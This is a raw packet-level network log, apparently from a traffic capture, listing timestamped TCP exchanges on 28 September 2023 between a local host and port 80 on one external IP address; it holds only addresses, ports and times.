Sep 28, 2023 06:04:29.025191069 CEST	50246	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.218697071 CEST	80	50246	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.223655939 CEST	80	50246	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.223822117 CEST	50246	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.325951099 CEST	50246	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.326262951 CEST	50247	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.513866901 CEST	80	50247	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.513972044 CEST	50247	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.514373064 CEST	50247	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.521214008 CEST	80	50246	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.521423101 CEST	50246	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.702617884 CEST	80	50247	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.707519054 CEST	80	50247	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.707794905 CEST	50247	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.810030937 CEST	50247	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.810395002 CEST	50248	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:29.997905016 CEST	80	50247	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:29.998212099 CEST	50247	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.006611109 CEST	80	50248	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:30.006778955 CEST	50248	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.006937027 CEST	50248	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.203190088 CEST	80	50248	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:30.207745075 CEST	80	50248	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:30.207830906 CEST	50248	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.326066017 CEST	50248	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.326546907 CEST	50250	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.517728090 CEST	80	50250	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:30.517895937 CEST	50250	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.518050909 CEST	50250	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.522974014 CEST	80	50248	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:30.523036957 CEST	50248	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.709391117 CEST	80	50250	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:30.714334965 CEST	80	50250	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:30.714529991 CEST	50250	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.826098919 CEST	50250	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:30.826641083 CEST	50251	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.016983986 CEST	80	50250	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.017165899 CEST	50250	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.032366991 CEST	80	50251	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.032506943 CEST	50251	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.032711029 CEST	50251	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.239070892 CEST	80	50251	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.241245985 CEST	80	50251	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.241408110 CEST	50251	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.357141018 CEST	50251	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.357383966 CEST	50252	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.544538021 CEST	80	50252	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.544853926 CEST	50252	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.561804056 CEST	50252	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.563674927 CEST	80	50251	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.563751936 CEST	50251	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:31.748863935 CEST	80	50252	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.753472090 CEST	80	50252	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:31.753563881 CEST	50252	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.126846075 CEST	50252	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.127320051 CEST	50254	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.314120054 CEST	80	50252	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:32.314237118 CEST	50252	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.323234081 CEST	80	50254	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:32.323450089 CEST	50254	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.323548079 CEST	50254	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.519424915 CEST	80	50254	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:32.521112919 CEST	80	50254	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:32.521271944 CEST	50254	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.638777018 CEST	50254	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.639149904 CEST	50255	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.827060938 CEST	80	50255	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:32.827142000 CEST	50255	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.827320099 CEST	50255	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:32.835369110 CEST	80	50254	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:32.835526943 CEST	50254	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.015001059 CEST	80	50255	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.020925999 CEST	80	50255	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.021229982 CEST	50255	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.138331890 CEST	50255	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.138704062 CEST	50256	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.326519966 CEST	80	50255	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.326845884 CEST	50255	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.336141109 CEST	80	50256	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.336338043 CEST	50256	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.336466074 CEST	50256	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.534149885 CEST	80	50256	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.539525032 CEST	80	50256	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.539707899 CEST	50256	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.659023046 CEST	50256	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.659600973 CEST	50258	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.854032040 CEST	80	50258	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.854252100 CEST	50258	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.854331970 CEST	50258	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:33.856323004 CEST	80	50256	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:33.856415987 CEST	50256	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.048304081 CEST	80	50258	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.052773952 CEST	80	50258	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.053039074 CEST	50258	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.154021025 CEST	50258	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.154445887 CEST	50259	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.348438978 CEST	80	50258	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.348853111 CEST	50258	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.351347923 CEST	80	50259	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.351449013 CEST	50259	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.351609945 CEST	50259	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.549211025 CEST	80	50259	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.554755926 CEST	80	50259	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.555080891 CEST	50259	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.673585892 CEST	50259	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.673902988 CEST	50260	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.869013071 CEST	80	50260	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.869131088 CEST	50260	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.869405031 CEST	50260	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:34.870615005 CEST	80	50259	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:34.870682001 CEST	50259	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.064783096 CEST	80	50260	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.068875074 CEST	80	50260	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.069124937 CEST	50260	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.185267925 CEST	50260	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.185790062 CEST	50262	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.380712032 CEST	80	50260	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.380969048 CEST	50260	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.382775068 CEST	80	50262	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.382941961 CEST	50262	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.383070946 CEST	50262	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.579853058 CEST	80	50262	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.584202051 CEST	80	50262	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.584467888 CEST	50262	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.685810089 CEST	50262	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.686297894 CEST	50263	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.882249117 CEST	80	50262	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.882409096 CEST	50262	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.886476994 CEST	80	50263	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:35.886589050 CEST	50263	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:35.886835098 CEST	50263	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.087311983 CEST	80	50263	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.091799974 CEST	80	50263	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.092166901 CEST	50263	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.200823069 CEST	50263	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.201205969 CEST	50264	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.398010969 CEST	80	50264	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.398226976 CEST	50264	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.398325920 CEST	50264	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.401521921 CEST	80	50263	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.401660919 CEST	50263	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.595298052 CEST	80	50264	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.598722935 CEST	80	50264	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.599025965 CEST	50264	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.701026917 CEST	50264	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.701437950 CEST	50266	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.885588884 CEST	80	50266	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.885875940 CEST	50266	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.885967970 CEST	50266	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:36.897536993 CEST	80	50264	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:36.897727966 CEST	50264	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.069982052 CEST	80	50266	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.075584888 CEST	80	50266	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.075886011 CEST	50266	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.185247898 CEST	50266	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.185692072 CEST	50267	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.369673014 CEST	80	50266	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.369793892 CEST	50266	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.391364098 CEST	80	50267	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.391557932 CEST	50267	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.391772985 CEST	50267	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.597731113 CEST	80	50267	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.602483988 CEST	80	50267	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.602869034 CEST	50267	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.716456890 CEST	50267	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.716871977 CEST	50268	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.907946110 CEST	80	50268	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.908132076 CEST	50268	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.908390999 CEST	50268	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:37.922367096 CEST	80	50267	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:37.922496080 CEST	50267	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.099111080 CEST	80	50268	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.103972912 CEST	80	50268	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.104191065 CEST	50268	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.216526985 CEST	50268	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.216867924 CEST	50270	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.407571077 CEST	80	50268	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.407634020 CEST	50268	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.413567066 CEST	80	50270	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.413645029 CEST	50270	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.413836956 CEST	50270	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.609828949 CEST	80	50270	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.614516020 CEST	80	50270	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.614773035 CEST	50270	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.716351986 CEST	50270	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.716732025 CEST	50271	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.912673950 CEST	80	50270	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.912748098 CEST	50270	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.914134026 CEST	80	50271	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:38.914287090 CEST	50271	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:38.914458036 CEST	50271	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.113609076 CEST	80	50271	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.118230104 CEST	80	50271	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.118431091 CEST	50271	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.216700077 CEST	50271	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.217067957 CEST	50272	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.413659096 CEST	80	50272	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.414050102 CEST	50272	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.414091110 CEST	50272	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.414268970 CEST	80	50271	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.414336920 CEST	50271	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.610811949 CEST	80	50272	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.615545034 CEST	80	50272	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.615802050 CEST	50272	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.716468096 CEST	50272	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.716846943 CEST	50274	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.907474995 CEST	80	50274	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.907623053 CEST	50274	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.907809973 CEST	50274	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:39.913054943 CEST	80	50272	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:39.913124084 CEST	50272	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.097906113 CEST	80	50274	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.103147030 CEST	80	50274	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.103225946 CEST	50274	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.201417923 CEST	50274	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.201744080 CEST	50275	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.392497063 CEST	80	50274	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.392595053 CEST	50274	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.397054911 CEST	80	50275	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.397142887 CEST	50275	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.397365093 CEST	50275	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.592514038 CEST	80	50275	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.597069025 CEST	80	50275	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.597265005 CEST	50275	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.701920033 CEST	50275	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.702331066 CEST	50276	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.896730900 CEST	80	50275	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.896795034 CEST	80	50276	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:40.896821022 CEST	50275	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.896878004 CEST	50276	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:40.897083044 CEST	50276	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.092427015 CEST	80	50276	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.097357988 CEST	80	50276	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.097426891 CEST	50276	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.202378988 CEST	50276	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.203039885 CEST	50278	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.397850037 CEST	80	50276	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.397936106 CEST	50276	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.400350094 CEST	80	50278	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.400435925 CEST	50278	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.400664091 CEST	50278	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.598206997 CEST	80	50278	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.603210926 CEST	80	50278	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.603307009 CEST	50278	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.700772047 CEST	50278	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.701244116 CEST	50279	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.899499893 CEST	80	50278	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.899591923 CEST	80	50279	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:41.899777889 CEST	50278	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.900060892 CEST	50279	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:41.900060892 CEST	50279	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.097759008 CEST	80	50279	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.099558115 CEST	80	50279	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.099653006 CEST	50279	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.201699018 CEST	50279	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.202043056 CEST	50280	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.388988018 CEST	80	50280	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.389303923 CEST	50280	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.389378071 CEST	50280	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.399797916 CEST	80	50279	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.399888039 CEST	50279	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.576348066 CEST	80	50280	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.581099033 CEST	80	50280	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.581398964 CEST	50280	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.685966969 CEST	50280	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.686245918 CEST	50282	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.873368979 CEST	80	50280	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.873666048 CEST	50280	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.876058102 CEST	80	50282	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:42.876224995 CEST	50282	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:42.876331091 CEST	50282	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.072207928 CEST	80	50282	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.083509922 CEST	80	50282	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.083687067 CEST	50282	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.185328007 CEST	50282	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.185651064 CEST	50283	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.375217915 CEST	80	50282	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.375314951 CEST	50282	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.385046005 CEST	80	50283	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.385155916 CEST	50283	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.385351896 CEST	50283	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.584707022 CEST	80	50283	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.589575052 CEST	80	50283	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.589629889 CEST	50283	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.685698986 CEST	50283	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.686202049 CEST	50284	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.876394033 CEST	80	50284	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.876666069 CEST	50284	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.876741886 CEST	50284	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:43.885518074 CEST	80	50283	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:43.885612011 CEST	50283	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.066843987 CEST	80	50284	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.071517944 CEST	80	50284	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.071682930 CEST	50284	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.169953108 CEST	50284	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.170284986 CEST	50286	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.361183882 CEST	80	50284	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.361406088 CEST	50284	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.363360882 CEST	80	50286	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.363481045 CEST	50286	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.363719940 CEST	50286	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.556997061 CEST	80	50286	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.561971903 CEST	80	50286	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.562066078 CEST	50286	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.669492960 CEST	50286	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.669944048 CEST	50287	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.860696077 CEST	80	50287	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.860794067 CEST	50287	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.860997915 CEST	50287	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:44.862824917 CEST	80	50286	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:44.862886906 CEST	50286	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.051810980 CEST	80	50287	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.053894043 CEST	80	50287	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.053971052 CEST	50287	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.154306889 CEST	50287	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.154720068 CEST	50288	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.345187902 CEST	80	50288	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.345287085 CEST	80	50287	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.345356941 CEST	50288	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.345508099 CEST	50287	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.345613956 CEST	50288	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.535824060 CEST	80	50288	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.536886930 CEST	80	50288	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.537102938 CEST	50288	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.638029099 CEST	50288	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.638457060 CEST	50290	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.829273939 CEST	80	50288	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.829355955 CEST	50288	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.836085081 CEST	80	50290	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:45.836185932 CEST	50290	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:45.836375952 CEST	50290	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.034147024 CEST	80	50290	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:46.037992954 CEST	80	50290	95.141.41.12	192.168.2.3
